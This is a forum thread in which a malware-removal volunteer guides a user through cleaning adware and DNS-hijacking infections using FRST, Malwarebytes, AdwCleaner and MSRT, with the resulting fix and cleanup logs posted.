Author Topic: [Resolved - K] openwith.exe popping up on the screen  (Read 231 times)

Offline feelityd08

  • Bronze Member
  • Posts: 8
[Resolved - K] openwith.exe popping up on the screen
« on: November 16, 2017, 05:16:00 AM »
hi guys , i'm having a problem with my pc. I recently deleted files which were quarantined by Mcafee livesafe and immediatley after that , an openwith.exe  started popping up on the screen asking me how i want to open a .tmp file and it pops up after every two minutes.  How can i deal with that problem
« Last Edit: November 20, 2017, 12:54:09 PM by kevinf80 »

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: openwith.exe popping up on the screen
« Reply #1 on: November 18, 2017, 03:26:35 AM »
Hello feelityd08 and welcome to SpywareHammer,

What is the name of the temp file being listed....? Run the following scan and post the two produced logs...

Download Farbar Recovery Scan Tool and save it to your desktop.

Alternative download option: http://www.techspot.com/downloads/6731-farbar-recovery-scan-tool.html

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

If your security alerts to FRST either, accept the alert or turn your security off to allow FRST to run. It is not malicious or infected in any way...

Be aware FRST must be run from an account with Administrator status...

  • Double-click to run it. When the tool opens click Yes to disclaimer.
    (Windows 8/10 users will be prompted about Windows SmartScreen protection - click More information and Run.)
  • Make sure Addition.txt is checkmarked under "Optional scans"
  • Press Scan button to run the tool....
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The tool will also make a log named (Addition.txt)  Please attach that log to your reply.
Thank you,

Kevin..

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: openwith.exe popping up on the screen
« Reply #2 on: November 18, 2017, 09:47:46 AM »
thank you Kevinf80  i will let you know after i try it

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: openwith.exe popping up on the screen
« Reply #3 on: November 18, 2017, 09:59:30 AM »
the pop up is still there and i have attached the log as you instructed

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: openwith.exe popping up on the screen
« Reply #4 on: November 18, 2017, 02:05:20 PM »
Hello feelityd08,

Your system is still infected, i`ll get this moved to the Malware Removal Forum... FRST produces two logs with its initial scan FRST.txt and Addition.txt we cannot progress until you post the secondary log Addition.txt. Logs are saved to the following folder: C:\FRST\Logs

Thank you,

Kevin....
« Last Edit: November 18, 2017, 02:09:43 PM by kevinf80 »

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: openwith.exe popping up on the screen
« Reply #5 on: November 19, 2017, 01:11:34 AM »
ii tried to open it using notepad  and its pointing out something about revopartner.exe

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: openwith.exe popping up on the screen
« Reply #6 on: November 19, 2017, 03:44:15 AM »
Can you also post secondary log from FRST, "Addition.txt" logs are saved here: C:\FRST\Logs I cannot progress until I see that log......

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #7 on: November 19, 2017, 05:55:06 AM »
im not sure which one is the secondary log so im gonna attach both of them

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7676
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #8 on: November 19, 2017, 11:25:38 AM »
Thanks for those logs, continue as follows:

Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into. "Do not open that file"
NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.

Open FRST and press the Fix button just once and wait.
The tool will make a log on the Desktop (Fixlog.txt) or the folder it was ran from. Please post it to your reply.

Next,

Open Malwarebytes Anti-Malware.

  • On the Settings tab > Protection Scroll to and make sure the following are selected:

    Scan for Rootkits
    Scan within Archives

  • Scroll further to Potential Threat Protection make sure the following are set as follows:

    Potentially Unwanted Programs (PUP`s)         set as :- Always detect PUP`s (recommended)
    Potentially Unwanted Modifications (PUM`s)  set as :- Alwaysdetect PUM`s (recommended)

  • Click on the Scan make sure Threat Scan is selected,
  • A Threat Scan will begin.
  • When the scan is complete if anything is found make sure that the first checkbox at the top is checked (that will automatically check all detected items), then click on the Quarantine Selected Tab
  • If asked to restart your computer to complete the removal, please do so
  • When complete click on Export Summary after deletion (bottom-left corner) and select Copy to Clipboard.
  • Wait for the prompt to restart the computer to appear, then click on Yes.
  • After the restart once you are back at your desktop, open MBAM once more to retrieve the log.

To get the log from Malwarebytes do the following:

  • Click on the Reports tab > from main interface.
  • Double click on the Scan log which shows the Date and time of the scan just performed.
  • Click Export > From export you have two options:

      Copy to Clipboard - if seleted right click to your reply and select "Paste" log will be pasted to your reply
      Text file (*.txt)        - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply
     

  • Use "Copy to Clipboard, then Right click to your reply > select "Paste" that will copy the log to your reply…

Next,

Download AdwCleaner by Malwarebytes onto your Desktop.

Or from this Mirror

  • Right-click on AdwCleaner.exe and select Run as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Accept the EULA (I accept), then click on Scan
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Clean button. This will kill all the active processes
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply

Next,

Download Microsoft's " Malicious Software Removal Tool" and save direct to the desktop

Ensure to get the correct version for your system....

https://www.microsoft.com/en-gb/download/malicious-software-removal-tool-details.aspx


Right click on the Tool, select “Run as Administrator” the tool will expand to the options Window
In the "Scan Type" window, select Quick Scan
Perform a scan and  Click Finish when the scan is done.


Retrieve the MSRT log as follows, and post it in your next reply:

1) Select the Windows key and R key together to open the "Run" function
2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:

notepad c:\windows\debug\mrt.log

The log will include log details for each time MSRT has run, we only need the most recent log by date and time....

Let me see those logs in your next reply, also tell me if you have any remaining issues or concerns...

Thank you,

Kevin...

Offline feelityd08

  • Bronze Member
  • Posts: 8
Re: [In Progress - K] openwith.exe popping up on the screen
« Reply #9 on: November 20, 2017, 01:37:12 AM »
Fix result of Farbar Recovery Scan Tool (x64) Version: 19-11-2017
Ran by BOSS TSAPO (20-11-2017 08:52:34) Run:1
Running from C:\Users\BOSS TSAPO\Downloads
Loaded Profiles: BOSS TSAPO (Available Profiles: BOSS TSAPO & DefaultAppPool)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
CloseProcesses:
CreateRestorePoint:
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\...\MountPoints2: {602eeec7-ae9d-11e7-af99-c85b76155e7d} - "I:\setup.exe"
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\...\Winlogon: [Shell] C:\WINDOWS\explorer.exe [4848960 2017-10-02] (Microsoft Corporation) <==== ATTENTION
GroupPolicy: Restriction <==== ATTENTION
ProxyServer: [S-1-5-21-2095655220-3272508173-1458086532-1001] => http=127.0.0.1:8080;https=127.0.0.1:8080
Winsock: Catalog5-x64 01 C:\ProgramData\Windows\System32\Mswapi64.dll [3302400 2017-07-19] ()
CMD: netsh winsock reset
C:\ProgramData\Windows\System32\Mswapi64.dll
Tcpip\Parameters: [DhcpNameServer] 41.79.193.253 41.79.193.254
Tcpip\Parameters: [NameServer] 82.163.143.136 82.163.142.138
Tcpip\..\Interfaces\{94c01e0b-9b72-49d6-863a-69309fc7b27d}: [DhcpNameServer] 82.163.143.136
Tcpip\..\Interfaces\{c5bf3128-6c5e-47a3-aaa7-3fdd10dbfd36}: [DhcpNameServer] 82.163.143.136
Tcpip\..\Interfaces\{cff16417-6e88-4e63-be40-7f0f7937f4e8}: [DhcpNameServer] 41.79.193.253 41.79.193.254
R2 AccountService; C:\Program Files\Essentware\Common\AccountService.exe [211136 2016-02-29] (Essentware) <==== ATTENTION
C:\Program Files\Essentware\Common\AccountService.exe
R2 PCKeeper2Service; C:\Program Files\Essentware\PCKeeper\PCKeeperService.exe [216512 2016-11-11] (Essentware) <==== ATTENTION
C:\Program Files\Essentware\PCKeeper\PCKeeperService.exe
R2 PCKeeperOcfService; C:\Program Files\Essentware\PCKeeper\OneClickFixService.exe [1179840 2016-11-11] (Essentware) <==== ATTENTION
C:\Program Files\Essentware\PCKeeper\OneClickFixService.exe
C:\Program Files\Essentware
S3 updater; C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe [464384 2016-01-10] (Nefarius Software Solutions) [File not signed]
C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe
C:\Program Files\Nefarius Software Solutions
S3 fileHiders; C:\WINDOWS\System32\DRIVERS\fileHiders.sys [32352 2016-11-11] () <==== ATTENTION
C:\WINDOWS\System32\DRIVERS\fileHiders.sys
R1 LanmaMaster; C:\Windows\system32\drivers\lanmamaster.sys [1474664 2016-10-25] () [File not signed] <==== ATTENTION
C:\Windows\system32\drivers\lanmamaster.sys
S1 exccodbf; \??\C:\WINDOWS\system32\drivers\exccodbf.sys [X]
2017-11-14 19:19 - 2017-11-14 19:19 - 000003684 _____ C:\WINDOWS\System32\Tasks\PCKeeper updater
2017-11-14 19:17 - 2017-11-14 19:17 - 000002050 _____ C:\Users\Public\Desktop\PCKeeper Antivirus.lnk
2017-11-14 19:16 - 2017-11-14 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Essentware
2017-11-14 19:16 - 2017-11-14 19:16 - 000002080 _____ C:\Users\Public\Desktop\PCKeeper.lnk
2017-11-14 19:16 - 2017-11-14 19:16 - 000000000 ____D C:\Users\BOSS TSAPO\AppData\Local\Essentware
2017-11-14 19:15 - 2017-11-17 19:19 - 000000000 ____D C:\ProgramData\Essentware
2017-11-14 19:15 - 2017-11-14 19:17 - 000000000 ____D C:\Program Files\Essentware
2017-11-14 19:14 - 2017-11-14 19:14 - 001708384 _____ (Essentware) C:\Users\BOSS TSAPO\Downloads\PCKeeper Installer.exe
2017-11-10 13:33 - 2017-11-10 13:35 - 020992472 _____ (SweetLabs,Inc.) C:\Users\BOSS TSAPO\AppData\Local\Temp\octD61A.tmp.exe
PCKeeper (HKLM\...\{F7DA7463-F666-41B3-B16B-8968A43BA6D4}) (Version: 2.2.2299 - Essentware) Hidden
PCKeeper Antivirus (HKLM\...\{5A4A7D29-7589-427B-86BC-8C313278BF89}) (Version: 1.1.1057 - Essentware) Hidden
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) Hidden <==== ATTENTION
C:\Program Files\PCKeeper
C:\ProgramData\PCKeeper
EmptyTemp:
Hosts:
CMD: ipconfig /flushDNS
end


*****************

Processes closed successfully.
Restore point was successfully created.
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION => restored successfully
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{602eeec7-ae9d-11e7-af99-c85b76155e7d} => key removed successfully
HKLM\Software\Classes\CLSID\{602eeec7-ae9d-11e7-af99-c85b76155e7d} => key not found.
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell => value removed successfully
C:\WINDOWS\system32\GroupPolicy\Machine => moved successfully
C:\WINDOWS\system32\GroupPolicy\GPT.ini => moved successfully
HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => value removed successfully
HKLM\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5\Catalog_Entries64\000000000001 => key removed successfully

========= netsh winsock reset =========

Initialization Function InitHelperDll in NSHHTTP.DLL failed to start with error code 11003

Sucessfully reset the Winsock Catalog.
You must restart the computer in order to complete the reset.


========= End of CMD: =========

C:\ProgramData\Windows\System32\Mswapi64.dll => moved successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{94c01e0b-9b72-49d6-863a-69309fc7b27d}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{c5bf3128-6c5e-47a3-aaa7-3fdd10dbfd36}\\DhcpNameServer => value removed successfully
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{cff16417-6e88-4e63-be40-7f0f7937f4e8}\\DhcpNameServer => value removed successfully
AccountService => Unable to stop service.
HKLM\System\CurrentControlSet\Services\AccountService => key removed successfully
AccountService => service removed successfully
C:\Program Files\Essentware\Common\AccountService.exe => moved successfully
PCKeeper2Service => Unable to stop service.
HKLM\System\CurrentControlSet\Services\PCKeeper2Service => key removed successfully
PCKeeper2Service => service removed successfully
C:\Program Files\Essentware\PCKeeper\PCKeeperService.exe => moved successfully
PCKeeperOcfService => Unable to stop service.
HKLM\System\CurrentControlSet\Services\PCKeeperOcfService => key removed successfully
PCKeeperOcfService => service removed successfully
C:\Program Files\Essentware\PCKeeper\OneClickFixService.exe => moved successfully

"C:\Program Files\Essentware" folder move:

Could not move "C:\Program Files\Essentware" => Scheduled to move on reboot.

HKLM\System\CurrentControlSet\Services\updater => key removed successfully
updater => service removed successfully
C:\Program Files\Nefarius Software Solutions\ScpToolkit\ScpUpdater.exe => moved successfully
C:\Program Files\Nefarius Software Solutions => moved successfully
HKLM\System\CurrentControlSet\Services\fileHiders => key removed successfully
fileHiders => service removed successfully
C:\WINDOWS\System32\DRIVERS\fileHiders.sys => moved successfully
LanmaMaster => Unable to stop service.
HKLM\System\CurrentControlSet\Services\LanmaMaster => key removed successfully
LanmaMaster => service removed successfully
C:\Windows\system32\drivers\lanmamaster.sys => moved successfully
HKLM\System\CurrentControlSet\Services\exccodbf => key removed successfully
exccodbf => service removed successfully
C:\WINDOWS\System32\Tasks\PCKeeper updater => moved successfully
C:\Users\Public\Desktop\PCKeeper Antivirus.lnk => moved successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Essentware => moved successfully
C:\Users\Public\Desktop\PCKeeper.lnk => moved successfully
C:\Users\BOSS TSAPO\AppData\Local\Essentware => moved successfully

"C:\ProgramData\Essentware" folder move:

Could not move "C:\ProgramData\Essentware" => Scheduled to move on reboot.


"C:\Program Files\Essentware" folder move:

Could not move "C:\Program Files\Essentware" => Scheduled to move on reboot.

C:\Users\BOSS TSAPO\Downloads\PCKeeper Installer.exe => moved successfully
C:\Users\BOSS TSAPO\AppData\Local\Temp\octD61A.tmp.exe => moved successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7DA7463-F666-41B3-B16B-8968A43BA6D4}\\SystemComponent => value removed successfully
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5A4A7D29-7589-427B-86BC-8C313278BF89}\\SystemComponent => value removed successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}\\SystemComponent => value removed successfully
"C:\Program Files\PCKeeper" => not found.
"C:\ProgramData\PCKeeper" => not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

========= ipconfig /flushDNS =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========


=========== EmptyTemp: ==========

BITS transfer queue => 8675328 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 30903848 B
Java, Flash, Steam htmlcache => 71077656 B
Windows/system/drivers => 636098819 B
Edge => 31018 B
Chrome => 73721502 B
Firefox => 386927292 B
Opera => 145226 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 2021890 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 33722590 B
BOSS TSAPO => 5341612081 B
DefaultAppPool => 0 B

RecycleBin => 0 B
EmptyTemp: => 6.1 GB temporary data Removed.

================================

Result of scheduled files to move (Boot Mode: Normal) (Date&Time: 20-11-2017 09:00:39)

"C:\Program Files\Essentware" => Could not move
"C:\ProgramData\Essentware" => Could not move
"C:\Program Files\Essentware" => Could not move

==== End of Fixlog 09:00:53 ====





# AdwCleaner 7.0.4.0 - Logfile created on Mon Nov 20 07:23:45 2017
# Updated on 2017/27/10 by Malwarebytes
# Running on Windows 10 Home Single Language (X64)
# Mode: clean
# Support: https://www.malwarebytes.com/support

***** [ Services ] *****

Deleted: PCKAVService


***** [ Folders ] *****

Deleted: C:\ProgramData\Host App Service
Deleted: C:\ProgramData\Application Data\Host App Service
Deleted: C:\Users\All Users\Host App Service
Deleted: C:\Users\BOSS TSAPO\AppData\Local\Host App Service
Deleted: C:\Users\Default\AppData\Local\Host App Service
Deleted: C:\Users\Default User\AppData\Local\Host App Service
Deleted: C:\Users\DefaultAppPool\AppData\Local\Host App Service
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\WMPNetworkAcSvc
Deleted: C:\ProgramData\WinZip\WinZip Smart Monitor
Deleted: C:\ProgramData\Application Data\WinZip\WinZip Smart Monitor
Deleted: C:\Users\All Users\WinZip\WinZip Smart Monitor
Deleted: C:\Program Files\WinZip Smart Monitor
Deleted: C:\Users\BOSS TSAPO\AppData\Local\AdvinstAnalytics
Deleted: C:\Program Files (x86)\WindowsTM
Deleted: C:\Users\All Users\Documents\XMUpdate
Deleted: C:\Users\Public\Documents\XMUpdate
Deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft\WebCompanion
Deleted: C:\Users\BOSS TSAPO\AppData\Local\PCBooster
Deleted: C:\ProgramData\Microleaves
Deleted: C:\ProgramData\Application Data\Microleaves
Deleted: C:\Program Files (x86)\Microleaves
Deleted: C:\Users\All Users\Microleaves
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\Microleaves
Deleted: C:\ProgramData\Essentware
Deleted: C:\ProgramData\Application Data\Essentware
Deleted: C:\Program Files\Essentware
Deleted: C:\Users\All Users\Essentware
Deleted: C:\\Users\Public\Documents\XMUpdate
Deleted: C:\ProgramData\1e164d5f
Deleted: C:\ProgramData\9463ebbb-3123-1
Deleted: C:\ProgramData\9463ebbb-6ff7-0
Deleted: C:\ProgramData\bda2b42c-0fa5-1
Deleted: C:\ProgramData\bda2b42c-5313-0
Deleted: C:\ProgramData\{318d22ec-212c-1}
Deleted: C:\ProgramData\{5a7c27e3-012c-0}


***** [ Files ] *****

Deleted: C:\Windows\SysNative\drivers\zeoscanner.sys
Deleted: C:\Windows\SysNative\lanmamasterHelp.dll
Deleted: C:\Users\BOSS TSAPO\appdata\local\installationconfiguration.xml
Deleted: C:\Users\BOSS TSAPO\AppData\Roaming\Mozilla\Firefox\Profiles\2gwlwnaw.default\searchplugins\yahoo-lavasoft.xml
Deleted: C:\Users\BOSS TSAPO\AppData\Local\PO.DB
Deleted: C:\Users\All Users\Desktop\MediaPlayAir.lnk
Deleted: C:\Users\Public\Desktop\MediaPlayAir.lnk


***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Cleaned: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\BOSS TSAPO\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk[http:\\pop.yeawindows.com\]
Cleaned: C:\Users\Public\Desktop\Google Chrome.lnk[http:\\pop.yeawindows.com\]


***** [ Tasks ] *****

Deleted: App Explorer
Deleted: ShadowsocksS
Deleted: FastDataX Task
Deleted: PCKeeper updater
Deleted: Updater_Online_Application
Deleted: DllKitPRO
Deleted: Updater_Online_Application


***** [ Registry ] *****

Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\utop.it
Deleted: [Key] - HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\utop.it
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E7E7B26A-88AA-48B0-A47C-173C062FD904}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E44BBEE3-3F83-4670-9E2E-EE0556442287}
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Host App Service
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKCU\Software\Host App Service
Deleted: [Key] - HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\Host App Service
Deleted: [Key] - HKLM\SOFTWARE\Lavasoft\Web Companion
Deleted: [Key] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Lavasoft\Web Companion
Deleted: [Key] - HKCU\Software\Lavasoft\Web Companion
Deleted: [Key] - HKLM\SOFTWARE\SkypeUpdateEx
Deleted: [Key] - HKLM\SOFTWARE\WMPNetworkAcSvc
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WindowsTM
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{990F7D4F-09EF-47DF-9ABE-BAF2DCCF5C4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{CF6E1E3B-5B36-4A71-9105-DC75B4089D8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0319DE47-F039-45DC-A213-DBB61C6AE509}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{074BFF31-CA38-43C4-8F25-79213AD708EF}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{0D838143-D511-4555-8B97-16C3CF5A780D}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{16A94A89-66C4-4990-896C-5FC3E1557FFD}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{206E5E13-3B8F-4146-9C21-F18A63A9689B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{2B5E8E95-F503-4530-A340-53DE89F3358F}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{2F8F99FD-7C0E-4150-8DFD-13B1F4FBD916}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{33B2A2E0-18F6-45CB-8080-04320066A4A1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{40B50C00-06BB-415F-8F4E-6DEF53957ABA}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{503F82AB-1549-4B08-AF10-289CCCF3BE4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6AF595D6-D4A0-4ACA-ADD4-62034EE9FF3A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{6F09F687-2C4C-4A37-8D7A-2CB76D2B3F71}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{723F0E89-F10C-4D28-A46C-934513EA963A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7944171A-50CC-479E-A6FC-B1E25E665C25}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{7A2BA8C4-F382-4DD1-A6D2-A86C6D66C4F9}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{80E9CB05-9C8B-4B85-8A66-D81092F5AF60}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{817BF5D8-380E-44F4-8E61-43E7ECF74B53}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{828FB706-5749-4255-862F-3D30FCF017E1}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{8888A22B-3380-4C2B-950F-A5B6EC527A4B}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{9443C19D-B318-4EBD-8A7F-6A50D0472FB4}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{95CAD169-7912-410E-8C8A-7BA1729BD8F7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B462C1CA-E368-4321-B0B1-0453E4AB6FDB}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{CCF68051-721D-40C7-812D-86ED0FDE7411}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{D8F2F7F9-F8F3-4562-9FDA-C1E2DAE60A30}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{DEE0443A-95B1-41DF-B50A-409FDEA53644}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F55EA208-E122-4B4E-8483-4404A1CC9569}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{F6649783-7559-4772-96C7-02D33BEACD8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\Interface\{F6649783-7559-4772-96C7-02D33BEACD8C}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D062B23B-F8EE-40EC-BF3F-7DB0E9FE1232}
Deleted: [Key] - HKLM\SOFTWARE\Classes\TypeLib\{D3F79FC5-65FE-4650-8979-3BF0CCF02C1A}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{05562BE7-0EFC-4BD2-BD8F-FAA363E68410}
Deleted: [Key] - HKLM\SOFTWARE\Classes\CLSID\{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Value] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|{B52115B1-936F-4EEA-A363-A535FB1942B7}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{56AD7EEE-D6C0-410E-8A7B-811DEA764554}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{E8EB2F1F-661E-4A7F-8F9A-77DEB757A906}
Deleted: [Key] - HKLM\SOFTWARE\Classes\AppID\{AF85DB83-06F2-4ECF-97CF-C46EDB06BE29}
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Features\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Key] - HKLM\SOFTWARE\Classes\Installer\Products\2311DC2B5C57F724B860D95A705A2A6B
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|YeaDesktop
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|Web Companion
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeper Antivirus
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeper Antivirus
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Value] - HKU\S-1-5-21-2095655220-3272508173-1458086532-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run|PCKeeperLive
Deleted: [Value] - HKCU\Software\Microsoft\Windows\CurrentVersion\Run|PCKeeperLive
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
Deleted: [Key] - HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services
